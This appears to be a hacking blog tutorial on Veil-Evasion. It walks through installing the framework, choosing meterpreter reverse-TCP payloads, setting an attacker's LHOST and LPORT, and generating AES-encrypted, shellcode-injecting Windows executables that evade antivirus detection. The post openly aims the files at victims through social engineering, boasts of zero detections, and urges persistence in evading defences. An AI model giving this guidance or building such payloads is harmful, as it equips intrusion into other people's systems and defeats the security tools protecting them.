Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either create your own exploit, or
change the signature of a known exploit or payload.
Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.
Some days ago Veil v2.0.4 was Released. I’m want to talk about it and give some examples about how to bypass severals anti-virus.
The main changes in this version is:
- x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
- Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.
There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris’ github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.
How to setup?
Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it’s a part of the Veil super project athttps://github.com/Veil-Framework/Veil which we recommend mosts users clone and install.
We can also use the payloads from Metasploit framework and its compatible for both x86 and x64 arch and update Veil either the command line or menu.
If you want to install Veil in your own environment you can use the commands below:
#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
#unzip -q master.zip
If you want to work with Kali Linux, with the commands below it will be enough:
apt-get update apt-get install veil
1. Install Veil-Evasion
We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:
kali > apt-get install veil-evasion
To start Veil-Evasion, just type:
kali > veil-evasion
When you do so, you will be greeted with this opening screen:
Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it “y” for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select “Install for all users” and click the “Next” button.
Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click “Next.”
Eventually, you will come to a screen like that below. Go ahead and click “Next” again.
Continue to click “Next” through several screens until you finally come to a window with the “Finish” button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.
2. Create an EXE with a Payload
In this first step, we will create a simple .exe file that will contain a payload that enables us to own the victim’s system. This could be used to send to the victim and having them click on it to execute it. Generally, this type of attack will be part of a social engineering attack.
Let’s now type “list” as this will list all of the payloads that Veil-Evasion can work with.
Those of you who are familiar with Metasploit will recognize many of these payloads.
3. Use a Payload
In this case, let’s use the ruby/meterpreter/rev_tcp, or number 44. Let’s type:
> use 44
When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.
We will need to set LHOST and LPORT.
> set LHOST 192.168.1.101> set LPORT 6996
Of course, use the appropriate IP address and port for your circumstances.
Next, we need to tell Veil-Evasion to generate the executable.
As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named “newpayload.exe” (you can name it whatever you please).
4. Generate an Encrypted Payload to Evade Detection
Next, let’s attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.
This is number 32 on our payload list, so type:
> info 32
It then returns info on this payload as seen below.
This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.
Next, let’s tell Veil-Evasion we want to use this payload.
> use 32
Here we have the option to change the default options if we care to do so. For now, let’s leave the default options as they are.
Next, let’s tell Veil-Evasion we want to generate this encrypted payload.
When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take few minutes, so be patient.
Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple “veilpayload.”
Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.
This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.
5. Checking Antivirus detection
You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!
Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works.
Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
Msfvenom: One Single Tool Instead Of Msfpayload And Msfencode
How To Get Root Access When People Visit Your Website – Metasploit Exploiting IE8